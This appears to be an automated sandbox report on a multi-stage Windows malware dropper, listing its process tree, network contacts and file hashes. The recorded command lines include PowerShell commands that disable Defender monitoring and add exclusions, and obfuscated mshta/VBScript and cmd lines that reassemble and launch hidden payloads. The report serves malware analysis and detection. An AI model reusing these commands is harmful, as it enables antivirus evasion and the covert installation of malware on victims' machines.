PID 2920 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 784 wrote to memory of 2256 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22d8c4cdc4a5a.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed2255741b48dffd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22d8c4cdc4a5a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22168eb266d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22d8c4cdc4a5a.exe

Wed22d8c4cdc4a5a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed220fb9dde4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22add6199f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22988be99e.exe

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22add6199f.exe

Wed22add6199f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22ac1480b8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed2235e1e9c9640.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22293324c9c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed224fff3f809a1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed228eebd341673e072.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22269ff37e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed227d9e0c1976ea6dc.exe

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed220fb9dde4.exe

Wed220fb9dde4.exe

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22168eb266d7a.exe

Wed22168eb266d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed2255741b48dffd.exe

Wed2255741b48dffd.exe

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed224fff3f809a1.exe

Wed224fff3f809a1.exe

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22269ff37e.exe

Wed22269ff37e.exe

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed2235e1e9c9640.exe

Wed2235e1e9c9640.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22ac1480b8.exe

Wed22ac1480b8.exe

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed228eebd341673e072.exe

Wed228eebd341673e072.exe

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed227d9e0c1976ea6dc.exe

Wed227d9e0c1976ea6dc.exe

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22988be99e.exe

Wed22988be99e.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCRiPt: ClOse ( creATEObjECt("WscRIpT.sHelL" ). rUn ("cmd.exe /q/c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22168eb266d7a.exe"" RuA3KQICsIEnUTi.exe && stARt RUA3KqiCSIENutI.eXE -PDOY18jViAcX9ec2G1idjTy2VmsYG & If """" =="""" for %z IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22168eb266d7a.exe"" ) do taskkill /f /IM ""%~nxz"" " , 0 , TRUe ) )

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22293324c9c.exe

Wed22293324c9c.exe

C:\Users\Admin\AppData\Local\Temp\is-VEK18.tmp\Wed228eebd341673e072.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VEK18.tmp\Wed228eebd341673e072.tmp" /SL5="$501FA,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed228eebd341673e072.exe"

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed228eebd341673e072.exe

"C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed228eebd341673e072.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-QHDG7.tmp\Wed228eebd341673e072.tmp

"C:\Users\Admin\AppData\Local\Temp\is-QHDG7.tmp\Wed228eebd341673e072.tmp" /SL5="$601FA,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed228eebd341673e072.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 476

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q/c Copy /Y "C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22168eb266d7a.exe" RuA3KQICsIEnUTi.exe && stARt RUA3KqiCSIENutI.eXE -PDOY18jViAcX9ec2G1idjTy2VmsYG & If "" =="" for %z IN ( "C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22168eb266d7a.exe" ) do taskkill /f /IM "%~nxz"

C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe

RUA3KqiCSIENutI.eXE -PDOY18jViAcX9ec2G1idjTy2VmsYG

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /IM "Wed22168eb266d7a.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCRiPt: ClOse ( creATEObjECt("WscRIpT.sHelL" ). rUn ("cmd.exe /q/c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe"" RuA3KQICsIEnUTi.exe && stARt RUA3KqiCSIENutI.eXE -PDOY18jViAcX9ec2G1idjTy2VmsYG & If ""-PDOY18jViAcX9ec2G1idjTy2VmsYG "" =="""" for %z IN ( ""C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe"" ) do taskkill /f /IM ""%~nxz"" " , 0 , TRUe ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q/c Copy /Y "C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe" RuA3KQICsIEnUTi.exe && stARt RUA3KqiCSIENutI.eXE -PDOY18jViAcX9ec2G1idjTy2VmsYG & If "-PDOY18jViAcX9ec2G1idjTy2VmsYG " =="" for %z IN ( "C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe" ) do taskkill /f /IM "%~nxz"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBScrIPT: Close ( cReATEOBjECt ( "wSCRipt.SHell"). rUn ( "cMD.exe /Q /C ecHO | seT /P = ""MZ"" > GSbPj.qVp & copy /B /Y GSBPj.qVP +NGSPtE2.3uY + O99N0.MK + Umd2y.O + 7BHI9XPY.U +JCHs.E3 M4WXZZ.Y & StARt msiexec.exe /y .\M4WxZZ.Y " , 0 , tRUe ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /C ecHO | seT /P = "MZ" > GSbPj.qVp & copy /B /Y GSBPj.qVP +NGSPtE2.3uY + O99N0.MK +Umd2y.O + 7BHI9XPY.U +JCHs.E3 M4WXZZ.Y & StARt msiexec.exe /y .\M4WxZZ.Y

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ecHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>GSbPj.qVp"

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe /y .\M4WxZZ.Y

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22ac1480b8.exe

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22ac1480b8.exe

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed2255741b48dffd.exe

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed2255741b48dffd.exe

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22add6199f.exe

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22add6199f.exe

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22ac1480b8.exe

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22ac1480b8.exe

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22ac1480b8.exe

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22ac1480b8.exe

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 mooorni.xyz udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 propanla.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
NL 194.104.136.5:46013 tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FI 135.181.129.119:4805 tcp
N/A 127.0.0.1:49299 tcp
N/A 127.0.0.1:49302 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
FR 51.178.186.149:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp

Files

\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe

MD5 9bd48b88b9a6aa6b854ee78d989ab074
SHA1 a80dee556656d0b79fe7ac79586a271663e567ee
SHA256 c06eda92e55652011e2285c576f89d223f3f28719e2eeefa2c117059fdce9e22
SHA512 46e4e9430bdf3743b3959a410509036513b8a7b65ee9fafcff174d5469c7de3f318022f11ac6d5d7efcb6067074c912a198c1ad5e38fc87a3482d68d91b6c316

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/2920-54-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2920-57-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2920-62-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2920-68-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2920-67-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2920-66-0x0000000064941000-0x000000006494F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22d8c4cdc4a5a.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed2255741b48dffd.exe

MD5 d75800977e3ec3199509eb2e0a6a28f5
SHA1 3edc49c3a466f3bbc977c42406fbd5c90d49e462
SHA256 90fc68c39590b8d6e7783e52e1660ff9ec68daee37940bf49399d95e6ad1fe7b
SHA512 5804a076e306d336f2897be6bb06e7cd80465977a8915ada3e9117128931611a13548b96086625cfc1e7477f067e68208bfceb5a5f38ce7e78716e20e81d4749

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed2235e1e9c9640.exe

MD5 dd67bc52c4a358f3f9fe5f1e37e9a989
SHA1 48d29006637f5f371866c1410bd704e297b79a0b
SHA256 2b16c77f19b87c5d055e4c8a3eb28ecfd0f64c5ced106298e8602a6cdeaa011c
SHA512 2d1eded3db08cfd2fa1599b3976142e63ccfaf94858a7b53efb37b6fec8a17ada0888bdf3f46ce58e1a3cf359d8442c159ad93527e736375bc25c4ea07afdc9b

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed220fb9dde4.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22168eb266d7a.exe

MD5 b7f0edadd7158822a222455fb8d7263d
SHA1 6fcb1b9e6b18afda8f14b57018e6a4f8cbca5442
SHA256 63ed58192e6acc9b2f67b7d5f6c23c2b573a23e9be6cdfc79cceefaeb23c128a
SHA512 1a70e3b84596c0098936a8b2c7cbbd013d380b7357f7dc9d7191c6644ea8a028d638da23f710361dd59c55e8fb1ef0d120abde1dc99f1310f43eff8f4c68657a

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed227d9e0c1976ea6dc.exe

MD5 74e0cb0402a028b086538805ab1b0c2b
SHA1 3d78a24bd8d720a017357e5ff195e961756c8b6c
SHA256 6c801bd308d7c4fee852e854d07869e188fb4bc8cd903515db7d2591c9855a75
SHA512 0b9b7c0c602495a685b824289243068f744377681364ecbf18ca2fecbfd8f9964cefccdf9af7820035245437eeae1dcb80e067862ce22ee0b741f2fee18dfb30

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed228eebd341673e072.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22293324c9c.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22ac1480b8.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22269ff37e.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed224fff3f809a1.exe

MD5 a02438d946903f95bd9f706ad0776c86
SHA1 d4b9470f0d24d94e3d327a456cb98fddd8fe61b4
SHA256 d24b5d75e56e99a246697efda3cf47ff9f1b841aaabb06f987804c02e83f5e0a
SHA512 b4301d4ea11f58bb8d6aae4326838ecbb558b485973e6d52553902a1d2a64217f69956a61470a7956513db904ffd2b1fc8ee55386cc02a4895e758d978ce52b4

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22988be99e.exe

MD5 f762e5f3316af686ea906f77787e9a1d
SHA1 09e60c8af577d5753121254663b85bbb7dfc638f
SHA256 557e0a9b0fd9c188589502ef21bea156733ad1bfead7551939e03b4412e2688d
SHA512 e49f1fdb55dbf9aec94ac581746adcd74ae99ee3698a49c377b8d7c2016662c90b89e3d8bb5494e7e5a95d073c35b4829fdc6cb896645de15488bcabb46f4a33

C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22add6199f.exe

MD5 fbf57ae8dbbb3084f998593061db2c5b
SHA1 0fb6712de7f6bc717af53fadbfa1234eec3f945d
SHA256 a8a5c94fd4826912cccf85b556621bd6e39915d79495e2cef843ef6913ce3041
SHA512 660781340cebdc420ebe9d42dd9a5fedb081dcdc4cf8341d85182e85f8b6b358c886a7e52427ca3345e3dadef1a2173abc8427e01d5faa287674d2417898a930

memory/2920-77-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2920-76-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2920-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2920-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2920-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2920-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2920-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2920-70-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2920-69-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 93d98f0dfd55bd4ad34e067f0e5e1c85
SHA1 5a463147612d9bbb4b79e98ab9adb16145546471
SHA256 73baf9bb4a1a046a6f71efe1b0b327a009a309799c867e0502494ae63d96b506
SHA512 03a83cc18a03bcde93bf476e078a594f0a4205a2bdf7b27d5f9e91da7ccdb1ac49d7c75d59101e5b236f833456b1185909ed44ebb719a6ab5e9ba0e14f784343

memory/1496-133-0x0000000000110000-0x0000000000180000-memory.dmp

memory/2352-132-0x0000000000BB0000-0x0000000000C22000-memory.dmp

memory/1112-130-0x0000000000CA0000-0x0000000000CB8000-memory.dmp

memory/1968-131-0x00000000008E0000-0x0000000000950000-memory.dmp

memory/1972-134-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1972-150-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1040-149-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1520-151-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1404-154-0x0000000000B30000-0x0000000000B38000-memory.dmp

memory/1112-155-0x00000000003D0000-0x00000000003D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-QHDG7.tmp\Wed228eebd341673e072.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\is-C8ICO.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-C8ICO.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/2920-175-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2920-174-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2920-173-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2920-172-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2920-171-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2920-169-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2628-188-0x0000000002410000-0x00000000025A7000-memory.dmp

memory/2712-189-0x0000000000400000-0x0000000002F01000-memory.dmp

memory/364-190-0x0000000000400000-0x0000000002F21000-memory.dmp

memory/1520-191-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2920-201-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2920-200-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2920-199-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2920-198-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2920-196-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2920-192-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2628-203-0x0000000002830000-0x00000000028D5000-memory.dmp

memory/2388-202-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2628-204-0x00000000028E0000-0x0000000002972000-memory.dmp

memory/2628-207-0x00000000028E0000-0x0000000002972000-memory.dmp

